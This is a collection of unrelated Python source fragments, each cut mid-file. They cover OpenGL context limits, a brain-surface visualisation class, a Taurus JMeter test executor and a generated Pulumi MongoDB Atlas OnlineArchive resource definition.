self.vertex_array = (0, 0)
self.geometry = (0, 0)
def incr(self, key):
created, freed = getattr(self, key)
setattr(self, key, (created + 1, freed))
if created % self.warn_threshold == 0 and created > 0:
LOG.debug(
"%s allocations passed threshold (%s) [created = %s] [freed = %s] [active = %s]",
key,
self.warn_threshold,
created,
freed,
created - freed,
)
def decr(self, key):
created, freed = getattr(self, key)
setattr(self, key, (created, freed + 1))
class Limits:
"""OpenGL Limitations"""
def __init__(self, ctx):
self._ctx = ctx
#: Minor version number of the OpenGL API supported by the current context
self.MINOR_VERSION = self.get(gl.GL_MINOR_VERSION)
#: Major version number of the OpenGL API supported by the current context.
self.MAJOR_VERSION = self.get(gl.GL_MAJOR_VERSION)
self.VENDOR = self.get_str(gl.GL_VENDOR)
self.RENDERER = self.get_str(gl.GL_RENDERER)
#: Value indicating the number of sample buffers associated with the framebuffer
self.SAMPLE_BUFFERS = self.get(gl.GL_SAMPLE_BUFFERS)
#: An estimate of the number of bits of subpixel resolution
#: that are used to position rasterized geometry in window coordinates
self.SUBPIXEL_BITS = self.get(gl.GL_SUBPIXEL_BITS)
#: A mask value indicating what context profile is used (core, compat etc.)
self.CONTEXT_PROFILE_MASK = self.get(gl.GL_CONTEXT_PROFILE_MASK)
#: Minimum required alignment for uniform buffer sizes and offset
self.UNIFORM_BUFFER_OFFSET_ALIGNMENT = self.get(
gl.GL_UNIFORM_BUFFER_OFFSET_ALIGNMENT
)
#: Value indicates the maximum number of layers allowed in an array texture, and must be at least 256
self.MAX_ARRAY_TEXTURE_LAYERS = self.get(gl.GL_MAX_ARRAY_TEXTURE_LAYERS)
#: A rough estimate of the largest 3D texture that the GL can handle. The value must be at least 64
self.MAX_3D_TEXTURE_SIZE = self.get(gl.GL_MAX_3D_TEXTURE_SIZE)
#: Maximum number of color attachments in a framebuffer
self.MAX_COLOR_ATTACHMENTS = self.get(gl.GL_MAX_COLOR_ATTACHMENTS)
#: Maximum number of samples in a color multisample texture
self.MAX_COLOR_TEXTURE_SAMPLES = self.get(gl.GL_MAX_COLOR_TEXTURE_SAMPLES)
#: the number of words for fragment shader uniform variables in all uniform blocks
self.MAX_COMBINED_FRAGMENT_UNIFORM_COMPONENTS = self.get(
gl.GL_MAX_COMBINED_FRAGMENT_UNIFORM_COMPONENTS
)
#: Number of words for geometry shader uniform variables in all uniform blocks
self.MAX_COMBINED_GEOMETRY_UNIFORM_COMPONENTS = self.get(
gl.GL_MAX_COMBINED_GEOMETRY_UNIFORM_COMPONENTS
)
#: Maximum supported texture image units that can be used to access texture maps from the vertex shader
self.MAX_COMBINED_TEXTURE_IMAGE_UNITS = self.get(
gl.GL_MAX_COMBINED_TEXTURE_IMAGE_UNITS
)
#: Maximum number of uniform blocks per program
self.MAX_COMBINED_UNIFORM_BLOCKS = self.get(gl.GL_MAX_COMBINED_UNIFORM_BLOCKS)
#: Number of words for vertex shader uniform variables in all uniform blocks
self.MAX_COMBINED_VERTEX_UNIFORM_COMPONENTS = self.get(
gl.GL_MAX_COMBINED_VERTEX_UNIFORM_COMPONENTS
)
#: A rough estimate of the largest cube-map texture that the GL can handle
self.MAX_CUBE_MAP_TEXTURE_SIZE = self.get(gl.GL_MAX_CUBE_MAP_TEXTURE_SIZE)
#: Maximum number of samples in a multisample depth or depth-stencil texture
self.MAX_DEPTH_TEXTURE_SAMPLES = self.get(gl.GL_MAX_DEPTH_TEXTURE_SAMPLES)
#: Maximum number of simultaneous outputs that may be written in a fragment shader
self.MAX_DRAW_BUFFERS = self.get(gl.GL_MAX_DRAW_BUFFERS)
#: Maximum number of active draw buffers when using dual-source blending
self.MAX_DUAL_SOURCE_DRAW_BUFFERS = self.get(gl.GL_MAX_DUAL_SOURCE_DRAW_BUFFERS)
#: Recommended maximum number of vertex array indices
self.MAX_ELEMENTS_INDICES = self.get(gl.GL_MAX_ELEMENTS_INDICES)
#: Recommended maximum number of vertex array vertices
self.MAX_ELEMENTS_VERTICES = self.get(gl.GL_MAX_ELEMENTS_VERTICES)
#: Maximum number of components of the inputs read by the fragment shader
self.MAX_FRAGMENT_INPUT_COMPONENTS = self.get(
gl.GL_MAX_FRAGMENT_INPUT_COMPONENTS
)
#: Maximum number of individual floating-point, integer, or boolean values that can be
#: held in uniform variable storage for a fragment shader
self.MAX_FRAGMENT_UNIFORM_COMPONENTS = self.get(
gl.GL_MAX_FRAGMENT_UNIFORM_COMPONENTS
)
#: maximum number of individual 4-vectors of floating-point, integer,
#: or boolean values that can be held in uniform variable storage for a fragment shader
self.MAX_FRAGMENT_UNIFORM_VECTORS = self.get(gl.GL_MAX_FRAGMENT_UNIFORM_VECTORS)
#: Maximum number of uniform blocks per fragment shader.
self.MAX_FRAGMENT_UNIFORM_BLOCKS = self.get(gl.GL_MAX_FRAGMENT_UNIFORM_BLOCKS)
#: Maximum number of components of inputs read by a geometry shader
self.MAX_GEOMETRY_INPUT_COMPONENTS = self.get(
| |
are displayed side-by-side
in different viewing panes.
surf : str
freesurfer surface mesh name (ie 'white', 'inflated', etc.)
title : str
title for the window
cortex : str, tuple, dict, or None
Specifies how the cortical surface is rendered. Options:
1. The name of one of the preset cortex styles:
``'classic'`` (default), ``'high_contrast'``,
``'low_contrast'``, or ``'bone'``.
2. A color-like argument to render the cortex as a single
color, e.g. ``'red'`` or ``(0.1, 0.4, 1.)``. Setting
this to ``None`` is equivalent to ``(0.5, 0.5, 0.5)``.
3. The name of a colormap used to render binarized
curvature values, e.g., ``Grays``.
4. A list of colors used to render binarized curvature
values. Only the first and last colors are used. E.g.,
['red', 'blue'] or [(1, 0, 0), (0, 0, 1)].
5. A container with four entries for colormap (string
specifiying the name of a colormap), vmin (float
specifying the minimum value for the colormap), vmax
(float specifying the maximum value for the colormap),
and reverse (bool specifying whether the colormap
should be reversed. E.g., ``('Greys', -1, 2, False)``.
6. A dict of keyword arguments that is passed on to the
call to surface.
alpha : float in [0, 1]
Alpha level to control opacity of the cortical surface.
size : float or pair of floats
the size of the window, in pixels. can be one number to specify
a square window, or the (width, height) of a rectangular window.
background : matplotlib color
Color of the background.
foreground : matplotlib color
Color of the foreground (will be used for colorbars and text).
None (default) will use black or white depending on the value
of ``background``.
figure : list of mayavi.core.scene.Scene | None | int
If None (default), a new window will be created with the appropriate
views. For single view plots, the figure can be specified as int to
retrieve the corresponding Mayavi window.
subjects_dir : str | None
If not None, this directory will be used as the subjects directory
instead of the value set using the SUBJECTS_DIR environment
variable.
views : list | str
views to use
offset : bool
If True, aligs origin with medial wall. Useful for viewing inflated
surface where hemispheres typically overlap (Default: True)
show_toolbar : bool
If True, toolbars will be shown for each view.
offscreen : bool | str
If True, rendering will be done offscreen (not shown). Useful
mostly for generating images or screenshots, but can be buggy.
Use at your own risk. Can be "auto" (default) to use
``mlab.options.offscreen``.
interaction : str
Can be "trackball" (default) or "terrain", i.e. a turntable-style
camera.
units : str
Can be 'm' or 'mm' (default).
Attributes
----------
annot : list
List of annotations.
brains : list
List of the underlying brain instances.
contour : list
List of the contours.
foci : foci
The foci.
labels : dict
The labels.
overlays : dict
The overlays.
texts : dict
The text objects.
"""
def __init__(self, subject_id, hemi, surf, title=None,
cortex="classic", alpha=1.0, size=800, background="black",
foreground=None, figure=None, subjects_dir=None,
views=['lat'], offset=True, show_toolbar=False,
offscreen='auto', interaction='trackball', units='mm'):
if not isinstance(interaction, string_types) or \
interaction not in ('trackball', 'terrain'):
raise ValueError('interaction must be "trackball" or "terrain", '
'got "%s"' % (interaction,))
self._units = _check_units(units)
col_dict = dict(lh=1, rh=1, both=1, split=2)
n_col = col_dict[hemi]
if hemi not in col_dict.keys():
raise ValueError('hemi must be one of [%s], not %s'
% (', '.join(col_dict.keys()), hemi))
# Get the subjects directory from parameter or env. var
subjects_dir = _get_subjects_dir(subjects_dir=subjects_dir)
self._hemi = hemi
if title is None:
title = subject_id
self.subject_id = subject_id
if not isinstance(views, list):
views = [views]
n_row = len(views)
# load geometry for one or both hemispheres as necessary
offset = None if (not offset or hemi != 'both') else 0.0
self.geo = dict()
if hemi in ['split', 'both']:
geo_hemis = ['lh', 'rh']
elif hemi == 'lh':
geo_hemis = ['lh']
elif hemi == 'rh':
geo_hemis = ['rh']
else:
raise ValueError('bad hemi value')
geo_kwargs, geo_reverse, geo_curv = self._get_geo_params(cortex, alpha)
for h in geo_hemis:
# Initialize a Surface object as the geometry
geo = Surface(subject_id, h, surf, subjects_dir, offset,
units=self._units)
# Load in the geometry and (maybe) curvature
geo.load_geometry()
if geo_curv:
geo.load_curvature()
self.geo[h] = geo
# deal with making figures
self._set_window_properties(size, background, foreground)
del background, foreground
figures, _v = _make_viewer(figure, n_row, n_col, title,
self._scene_size, offscreen,
interaction)
self._figures = figures
self._v = _v
self._window_backend = 'Mayavi' if self._v is None else 'TraitsUI'
for ff in self._figures:
for f in ff:
if f.scene is not None:
f.scene.background = self._bg_color
f.scene.foreground = self._fg_color
# force rendering so scene.lights exists
_force_render(self._figures)
self.toggle_toolbars(show_toolbar)
_force_render(self._figures)
self._toggle_render(False)
# fill figures with brains
kwargs = dict(geo_curv=geo_curv, geo_kwargs=geo_kwargs,
geo_reverse=geo_reverse, subjects_dir=subjects_dir,
bg_color=self._bg_color, fg_color=self._fg_color)
brains = []
brain_matrix = []
for ri, view in enumerate(views):
brain_row = []
for hi, h in enumerate(['lh', 'rh']):
if not (hemi in ['lh', 'rh'] and h != hemi):
ci = hi if hemi == 'split' else 0
kwargs['hemi'] = h
kwargs['geo'] = self.geo[h]
kwargs['figure'] = figures[ri][ci]
kwargs['backend'] = self._window_backend
brain = _Hemisphere(subject_id, **kwargs)
brain.show_view(view)
brains += [dict(row=ri, col=ci, brain=brain, hemi=h)]
brain_row += [brain]
brain_matrix += [brain_row]
self._toggle_render(True)
self._original_views = views
self._brain_list = brains
for brain in self._brain_list:
brain['brain']._orient_lights()
self.brains = [b['brain'] for b in brains]
self.brain_matrix = np.array(brain_matrix)
self.subjects_dir = subjects_dir
self.surf = surf
# Initialize the overlay and label dictionaries
self.foci_dict = dict()
self._label_dicts = dict()
self.overlays_dict = dict()
self.contour_list = []
self.morphometry_list = []
self.annot_list = []
self._data_dicts = dict(lh=[], rh=[])
# note that texts gets treated differently
self.texts_dict = dict()
self._times = None
self.n_times = None
@property
def data_dict(self):
"""For backwards compatibility"""
lh_list = self._data_dicts['lh']
rh_list = self._data_dicts['rh']
return dict(lh=lh_list[-1] if lh_list else None,
rh=rh_list[-1] if rh_list else None)
@property
def labels_dict(self):
"""For backwards compatibility"""
return {key: data['surfaces'] for key, data in
self._label_dicts.items()}
###########################################################################
# HELPERS
def _toggle_render(self, state, views=None):
"""Turn rendering on (True) or off (False)"""
figs = [fig for fig_row in self._figures for fig in fig_row]
if views is None:
views = [None] * len(figs)
for vi, (_f, view) in enumerate(zip(figs, views)):
# Testing backend doesn't have these options
if mlab.options.backend == 'test':
continue
if state is False and view is None:
views[vi] = (mlab.view(figure=_f), mlab.roll(figure=_f),
_f.scene.camera.parallel_scale
if _f.scene is not None else False)
if _f.scene is not None:
_f.scene.disable_render = not state
if state is True and view is not None and _f.scene is not None:
mlab.draw(figure=_f)
with warnings.catch_warnings(record=True): # traits focalpoint
mlab.view(*view[0], figure=_f)
mlab.roll(view[1], figure=_f)
# let's do the ugly force draw
if state is True:
_force_render(self._figures)
return views
def _set_window_properties(self, size, background, foreground):
"""Set window properties that are used elsewhere."""
# old option "size" sets both width and height
from matplotlib.colors import colorConverter
try:
width, height = size
except (TypeError, ValueError):
width, height = size, size
self._scene_size = height, width
self._bg_color = colorConverter.to_rgb(background)
if foreground is None:
foreground = 'w' if sum(self._bg_color) < 2 else 'k'
self._fg_color = colorConverter.to_rgb(foreground)
def _get_geo_params(self, cortex, alpha=1.0):
"""Return keyword arguments and other parameters for surface
rendering.
Parameters
----------
cortex : {str, tuple, dict, None}
Can be set to: (1) the name of one of the preset cortex
styles ('classic', 'high_contrast', 'low_contrast', or
'bone'), (2) the name of a colormap, (3) a tuple with
four entries for (colormap, vmin, vmax, reverse)
indicating the name of the colormap, the min and max
values respectively and whether or not the colormap should
be reversed, (4) a valid color specification (such as a
3-tuple with RGB values or a valid color name), or (5) a
dictionary of keyword arguments that is passed on to the
call to surface. If set to None, color is set to (0.5,
0.5, 0.5).
alpha : float in [0, 1]
Alpha level to control opacity of the cortical surface.
Returns
-------
kwargs : dict
Dictionary with keyword arguments to be used for surface
rendering. For colormaps, keys are ['colormap', | |
contains
any data and throws exception otherwise.
:return: bool
:raise ToolError:
"""
self.retcode = self.process.poll()
if self.retcode is not None:
if self.retcode != 0:
raise ToolError("JMeter exited with non-zero code: %s" % self.retcode, self.get_error_diagnostics())
return True
return False
def shutdown(self):
"""
If JMeter is still running - let's stop it.
"""
max_attempts = self.settings.get("shutdown-wait", 5)
if self._process_stopped(1):
return
try:
if not self.settings.get("gui", False):
udp_sock = socket.socket(type=socket.SOCK_DGRAM)
self.log.info("Sending Shutdown command to JMeter on port %d...", self.management_port)
udp_sock.sendto(b"Shutdown", ("localhost", self.management_port))
if self._process_stopped(max_attempts):
self.log.debug("JMeter stopped on Shutdown command")
return
self.log.info("Sending StopTestNow command to JMeter on port %d...", self.management_port)
udp_sock.sendto(b"StopTestNow", ("localhost", self.management_port))
if self._process_stopped(max_attempts):
self.log.debug("JMeter stopped on StopTestNow command")
return
finally:
if not self._process_stopped(1):
self.log.warning("JMeter process is still alive, killing it")
shutdown_process(self.process, self.log)
if self.start_time:
self.end_time = time.time()
self.log.debug("JMeter worked for %s seconds", self.end_time - self.start_time)
def post_process(self):
self.engine.existing_artifact(self.modified_jmx, True)
if self.stdout_file:
self.stdout_file.close()
if self.stderr_file:
self.stderr_file.close()
def has_results(self):
if self.reader and self.reader.read_records:
return True
else:
return False
def _process_stopped(self, cycles):
while cycles > 0:
cycles -= 1
if self.process and self.process.poll() is None:
time.sleep(self.engine.check_interval)
else:
return True
return False
def _set_remote_port(self):
"""
set management udp port
:return:
"""
if not JMeterExecutor.UDP_PORT_NUMBER:
JMeterExecutor.UDP_PORT_NUMBER = self.settings.get("shutdown-port", 4445)
else:
JMeterExecutor.UDP_PORT_NUMBER += 1
while not self.__port_is_free(JMeterExecutor.UDP_PORT_NUMBER):
self.log.debug("Port %d is busy, trying next one", JMeterExecutor.UDP_PORT_NUMBER)
if JMeterExecutor.UDP_PORT_NUMBER == 65535:
TaurusInternalException("JMeter: no free ports for management interface")
else:
JMeterExecutor.UDP_PORT_NUMBER += 1
self.management_port = JMeterExecutor.UDP_PORT_NUMBER
self.log.debug("Using port %d for management", self.management_port)
def __port_is_free(self, port_num):
"""
:return: Bool
"""
udp_sock = socket.socket(type=socket.SOCK_DGRAM)
try:
self.log.debug("Checking if port %d is free", port_num)
udp_sock.bind(("localhost", port_num))
udp_sock.close()
self.log.debug("Port %d is free", port_num)
return True
except socket.error:
self.log.debug("Port %d is busy", port_num)
return False
@staticmethod
def __disable_listeners(jmx):
"""
Set ResultCollector to disabled
:param jmx: JMX
:return:
"""
sel = 'stringProp[name=filename]'
xpath = GenericTranslator().css_to_xpath(sel)
listeners = jmx.get('ResultCollector')
for listener in listeners:
file_setting = listener.xpath(xpath)
if not file_setting or not file_setting[0].text:
listener.set("enabled", "false")
def __apply_test_mode(self, jmx):
func_mode = self.engine.is_functional_mode()
test_plan_selector = "jmeterTestPlan>hashTree>TestPlan"
plans = jmx.get(test_plan_selector)
if not plans:
self.log.warning("No test plans, can't set test mode")
return
test_plan = plans[0]
props = test_plan.xpath('boolProp[@name="TestPlan.functional_mode"]')
if props:
prop = props[0]
prop.text = "true" if func_mode else "false"
else:
element = jmx._get_functional_mode_prop(func_mode)
jmx.append(test_plan_selector, element)
@staticmethod
def __fill_empty_delimiters(jmx):
delimiters = jmx.get("CSVDataSet>stringProp[name='delimiter']")
for delimiter in delimiters:
if not delimiter.text:
delimiter.text = ','
@staticmethod
def __add_listener(lst, jmx):
jmx.append(JMeterScenarioBuilder.TEST_PLAN_SEL, lst)
jmx.append(JMeterScenarioBuilder.TEST_PLAN_SEL, etree.Element("hashTree"))
def __add_result_listeners(self, jmx):
if self.engine.is_functional_mode():
self.__add_trace_writer(jmx)
else:
self.__add_result_writers(jmx)
def __add_trace_writer(self, jmx):
self.log_jtl = self.engine.create_artifact("trace", ".jtl")
flags = self.settings.get('xml-jtl-flags')
log_lst = jmx.new_xml_listener(self.log_jtl, True, flags)
self.__add_listener(log_lst, jmx)
def __add_result_writers(self, jmx):
version = LooseVersion(str(self.settings.get('version', self.JMETER_VER)))
flags = {}
if version < LooseVersion("2.13"):
flags['^connectTime'] = False
self.kpi_jtl = self.engine.create_artifact("kpi", ".jtl")
kpi_lst = jmx.new_kpi_listener(self.kpi_jtl, flags)
self.__add_listener(kpi_lst, jmx)
verbose = self.engine.config.get(SETTINGS).get("verbose", False)
jtl_log_level = self.execution.get('write-xml-jtl', "full" if verbose else 'error')
flags = self.settings.get('xml-jtl-flags')
if jtl_log_level == 'error':
self.log_jtl = self.engine.create_artifact("error", ".jtl")
log_lst = jmx.new_xml_listener(self.log_jtl, False, flags)
self.__add_listener(log_lst, jmx)
elif jtl_log_level == 'full':
self.log_jtl = self.engine.create_artifact("trace", ".jtl")
log_lst = jmx.new_xml_listener(self.log_jtl, True, flags)
self.__add_listener(log_lst, jmx)
def __force_tran_parent_sample(self, jmx):
scenario = self.get_scenario()
if scenario.get("force-parent-sample", True):
self.log.debug("Enforcing parent sample for transaction controller")
jmx.set_text('TransactionController > boolProp[name="TransactionController.parent"]', 'true')
def __get_modified_jmx(self, original, is_jmx_generated):
"""
add two listeners to test plan:
- to collect basic stats for KPIs
- to collect detailed errors/trace info
:return: path to artifact
"""
self.log.debug("Load: %s", self.get_specific_load())
jmx = JMX(original)
if self.get_scenario().get("disable-listeners", not self.settings.get("gui", False)):
JMeterExecutor.__disable_listeners(jmx)
user_def_vars = self.get_scenario().get("variables")
if user_def_vars:
jmx.append(JMeterScenarioBuilder.TEST_PLAN_SEL, jmx.add_user_def_vars_elements(user_def_vars))
jmx.append(JMeterScenarioBuilder.TEST_PLAN_SEL, etree.Element("hashTree"))
headers = self.get_scenario().get_headers()
if headers:
jmx.append(JMeterScenarioBuilder.TEST_PLAN_SEL, JMX._get_header_mgr(headers))
jmx.append(JMeterScenarioBuilder.TEST_PLAN_SEL, etree.Element("hashTree"))
self.__apply_test_mode(jmx)
self.__add_result_listeners(jmx)
if not is_jmx_generated:
self.__force_tran_parent_sample(jmx)
version = LooseVersion(str(self.settings.get('version', self.JMETER_VER)))
if version >= LooseVersion("3.2"):
self.__force_hc4_cookie_handler(jmx)
self.__fill_empty_delimiters(jmx)
self.__apply_modifications(jmx)
LoadSettingsProcessor(self).modify(jmx)
return jmx
def __force_hc4_cookie_handler(self, jmx):
selector = "[testclass=CookieManager]"
fix_counter = 0
for node in jmx.get(selector):
name = "CookieManager.implementation"
if not node.get(name):
val = "org.apache.jmeter.protocol.http.control.HC4CookieHandler"
node.append(JMX._string_prop(name, val))
fix_counter += 1
if fix_counter:
self.log.info('%s obsolete CookieManagers are found and fixed' % fix_counter)
def __save_modified_jmx(self, jmx, original_jmx_path, is_jmx_generated):
script_name, _ = os.path.splitext(os.path.basename(original_jmx_path))
modified_script_name = "modified_" + script_name
if is_jmx_generated:
filename = self.engine.create_artifact(modified_script_name, ".jmx")
else:
script_dir = get_full_path(original_jmx_path, step_up=1)
filename = get_uniq_name(script_dir, modified_script_name, ".jmx")
jmx.save(filename)
return filename
def __jmx_from_requests(self):
"""
Generate jmx file from requests
:return:
"""
filename = self.engine.create_artifact("requests", ".jmx")
jmx = JMeterScenarioBuilder(self)
jmx.save(filename)
self.settings.merge(jmx.system_props)
return filename
@staticmethod
def __write_props_to_file(file_path, params):
"""
Write properties to file
:param file_path:
:param params:
:return:
"""
with open(file_path, 'w') as fds:
for key, val in iteritems(params):
fds.write("%s=%s\n" % (key, val))
def get_widget(self):
"""
Add progress widget to console screen sidebar
:return:
"""
if not self.widget:
label = "%s" % self
self.widget = ExecutorWidget(self, "JMeter: " + label.split('/')[1])
return self.widget
def __modify_resources_paths_in_jmx(self, jmx, file_list):
"""
Modify resource files paths in jmx etree
:param jmx: JMX
:param file_list: list
:return:
"""
file_set = set(file_list)
missed_files = []
while file_set:
filename = file_set.pop()
file_path_elements = jmx.xpath('//stringProp[text()="%s"]' % filename)
if not file_path_elements:
missed_files.append(filename)
for file_path_element in file_path_elements:
basename = os.path.basename(filename)
self.log.debug("Replacing JMX path %s with %s", file_path_element.text, basename)
file_path_element.text = basename
if missed_files:
self.log.warning("Files not found in JMX: %s", missed_files)
def _resolve_jmx_relpaths(self, resource_files_from_jmx):
"""
Attempt to paths relative to JMX script itself.
:param resource_files_from_jmx:
:return:
"""
resource_files = []
script_basedir = os.path.dirname(get_full_path(self.original_jmx))
for res_file in resource_files_from_jmx:
if not os.path.exists(res_file):
path_relative_to_jmx = os.path.join(script_basedir, res_file)
if os.path.exists(path_relative_to_jmx):
self.log.info("Resolved resource file with path relative to JMX: %s", path_relative_to_jmx)
resource_files.append(path_relative_to_jmx)
continue
resource_files.append(res_file)
return resource_files
def resource_files(self):
"""
Get list of resource files, modify jmx file paths if necessary
"""
# get all resource files from requests
scenario = self.get_scenario()
resource_files = self.res_files_from_scenario(scenario)
self.original_jmx = self.get_script_path()
if self.original_jmx:
jmx = JMX(self.original_jmx)
resource_files_from_jmx = JMeterExecutor.__get_resource_files_from_jmx(jmx)
if resource_files_from_jmx:
execution_files = self.execution.get('files', [], force_set=True)
execution_files.extend(self._resolve_jmx_relpaths(resource_files_from_jmx))
self.__modify_resources_paths_in_jmx(jmx.tree, resource_files_from_jmx)
script_name, script_ext = os.path.splitext(os.path.basename(self.original_jmx))
self.original_jmx = self.engine.create_artifact(script_name, script_ext)
jmx.save(self.original_jmx)
scenario[Scenario.SCRIPT] = self.original_jmx
script = self.get_scenario().get(Scenario.SCRIPT, None)
if script:
resource_files.append(script)
return resource_files
@staticmethod
def __get_resource_files_from_jmx(jmx):
"""
Get list of resource files paths from jmx scenario
:return: (file list)
"""
resource_files = []
exclude_elements = ['kg.apc.jmeter.jmxmon.JMXMonCollector', 'JSR223Listener',
'kg.apc.jmeter.vizualizers.CorrectedResultCollector',
'kg.apc.jmeter.reporters.FlexibleFileWriter', 'BSFListener',
'kg.apc.jmeter.dbmon.DbMonCollector', 'BeanShellListener', 'MailerResultCollector',
'kg.apc.jmeter.perfmon.PerfMonCollector', 'ResultCollector',
'kg.apc.jmeter.vizualizers.CompositeResultCollector',
'kg.apc.jmeter.reporters.LoadosophiaUploader']
search_patterns = ["File.path", "filename", "BeanShellSampler.filename"]
for pattern in search_patterns:
resource_elements = jmx.tree.findall(".//stringProp[@name='%s']" % pattern)
for resource_element in resource_elements:
# check if none of parents are disabled
parent = resource_element.getparent()
parent_disabled = False
while parent is not None: # ?
if parent.get('enabled') == 'false' or parent.tag in exclude_elements:
parent_disabled = True
break
parent = parent.getparent()
if resource_element.text and not parent_disabled and not has_variable_pattern(resource_element.text):
resource_files.append(resource_element.text)
return resource_files
def res_files_from_scenario(self, scenario):
files = []
data_sources = scenario.data.get('data-sources')
if data_sources:
for data_source in data_sources:
if isinstance(data_source, string_types):
files.append(data_source)
elif isinstance(data_source, dict):
files.append(data_source['path'])
requests = scenario.get_requests()
for req in requests:
files.extend(self.res_files_from_request(req))
self.resource_files_collector.clear_path_cache()
return files
def res_files_from_request(self, request):
if self.resource_files_collector is None:
self.resource_files_collector = ResourceFilesCollector(self)
return self.resource_files_collector.visit(request)
def __apply_modifications(self, jmx):
"""
:type jmx: JMX
"""
modifs = self.get_scenario().get("modifications")
if 'disable' in modifs:
self.__apply_enable_disable(modifs, 'disable', jmx)
if 'enable' in modifs:
self.__apply_enable_disable(modifs, 'enable', jmx)
if 'set-prop' in modifs:
items = modifs['set-prop']
for path, text in iteritems(items):
parts = path.split('>')
if len(parts) < 2:
raise TaurusConfigError("JMeter: property selector must have at least 2 levels")
sel_parts = ["[testname='%s']" % parts[0]] # TODO: support wildcards in element names
for add in parts[1:]:
sel_parts.append("[name='%s']" % add)
selector = '>'.join(sel_parts)
if not jmx.set_text(selector, text):
selector = '>'.join(sel_parts[:-1])
if jmx.get(selector):
jmx.append(selector, JMX._string_prop(parts[-1], text))
else:
self.log.warning("No elements matched for set-prop: %s", path)
def __apply_enable_disable(self, modifs, action, jmx):
items = modifs[action]
if not isinstance(items, list):
modifs[action] = [items]
items = modifs[action]
for name in items:
candidates = jmx.get("[testname]")
for candidate in candidates:
if fnmatch.fnmatch(candidate.get('testname'), name):
jmx.set_enabled("[testname='%s']" % candidate.get('testname'),
True if action == 'enable' else False)
def install_required_tools(self):
"""
check tools
"""
required_tools = [JavaVM(self.log), TclLibrary(self.log)]
for tool in required_tools:
if not tool.check_if_installed():
tool.install()
jmeter_version = self.settings.get("version", JMeterExecutor.JMETER_VER, force_set=True)
jmeter_path = self.settings.get("path", "~/.bzt/jmeter-taurus/{version}/", force_set=True)
jmeter_path = get_full_path(jmeter_path)
download_link = self.settings.get("download-link", None)
plugins = self.settings.get("plugins", [])
proxy = self.engine.config.get('settings').get('proxy')
self.tool = JMeter(jmeter_path, self.log, jmeter_version, download_link, plugins, proxy)
if self._need_to_install(self.tool):
self.tool.install()
self.settings['path'] = self.tool.tool_path
@staticmethod
def _need_to_install(tool):
end_str_l = os.path.join('bin', 'jmeter' + EXE_SUFFIX)
end_str_s = os.path.join('bin', 'jmeter')
if os.path.isfile(tool.tool_path):
if tool.check_if_installed(): # all ok, it's really tool path
return False
else: # probably it's path to other tool)
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['OnlineArchiveArgs', 'OnlineArchive']
@pulumi.input_type
class OnlineArchiveArgs:
def __init__(__self__, *,
cluster_name: pulumi.Input[str],
coll_name: pulumi.Input[str],
criteria: pulumi.Input['OnlineArchiveCriteriaArgs'],
db_name: pulumi.Input[str],
project_id: pulumi.Input[str],
partition_fields: Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]] = None,
paused: Optional[pulumi.Input[bool]] = None,
sync_creation: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a OnlineArchive resource.
:param pulumi.Input[str] cluster_name: Name of the cluster that contains the collection.
:param pulumi.Input[str] coll_name: Name of the collection.
:param pulumi.Input['OnlineArchiveCriteriaArgs'] criteria: Criteria to use for archiving data.
:param pulumi.Input[str] db_name: Name of the database that contains the collection.
:param pulumi.Input[str] project_id: The unique ID for the project
:param pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]] partition_fields: Fields to use to partition data. You can specify up to two frequently queried fields to use for partitioning data. Note that queries that don’t contain the specified fields will require a full collection scan of all archived documents, which will take longer and increase your costs. To learn more about how partition improves query performance, see [Data Structure in S3](https://docs.mongodb.com/datalake/admin/optimize-query-performance/#data-structure-in-s3). The value of a partition field can be up to a maximum of 700 characters. Documents with values exceeding 700 characters are not archived.
:param pulumi.Input[bool] paused: State of the online archive. This is required for pausing an active or resume a paused online archive. The resume request will fail if the collection has another active online archive.
"""
pulumi.set(__self__, "cluster_name", cluster_name)
pulumi.set(__self__, "coll_name", coll_name)
pulumi.set(__self__, "criteria", criteria)
pulumi.set(__self__, "db_name", db_name)
pulumi.set(__self__, "project_id", project_id)
if partition_fields is not None:
pulumi.set(__self__, "partition_fields", partition_fields)
if paused is not None:
pulumi.set(__self__, "paused", paused)
if sync_creation is not None:
pulumi.set(__self__, "sync_creation", sync_creation)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Input[str]:
"""
Name of the cluster that contains the collection.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster_name", value)
@property
@pulumi.getter(name="collName")
def coll_name(self) -> pulumi.Input[str]:
"""
Name of the collection.
"""
return pulumi.get(self, "coll_name")
@coll_name.setter
def coll_name(self, value: pulumi.Input[str]):
pulumi.set(self, "coll_name", value)
@property
@pulumi.getter
def criteria(self) -> pulumi.Input['OnlineArchiveCriteriaArgs']:
"""
Criteria to use for archiving data.
"""
return pulumi.get(self, "criteria")
@criteria.setter
def criteria(self, value: pulumi.Input['OnlineArchiveCriteriaArgs']):
pulumi.set(self, "criteria", value)
@property
@pulumi.getter(name="dbName")
def db_name(self) -> pulumi.Input[str]:
"""
Name of the database that contains the collection.
"""
return pulumi.get(self, "db_name")
@db_name.setter
def db_name(self, value: pulumi.Input[str]):
pulumi.set(self, "db_name", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
The unique ID for the project
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="partitionFields")
def partition_fields(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]]:
"""
Fields to use to partition data. You can specify up to two frequently queried fields to use for partitioning data. Note that queries that don’t contain the specified fields will require a full collection scan of all archived documents, which will take longer and increase your costs. To learn more about how partition improves query performance, see [Data Structure in S3](https://docs.mongodb.com/datalake/admin/optimize-query-performance/#data-structure-in-s3). The value of a partition field can be up to a maximum of 700 characters. Documents with values exceeding 700 characters are not archived.
"""
return pulumi.get(self, "partition_fields")
@partition_fields.setter
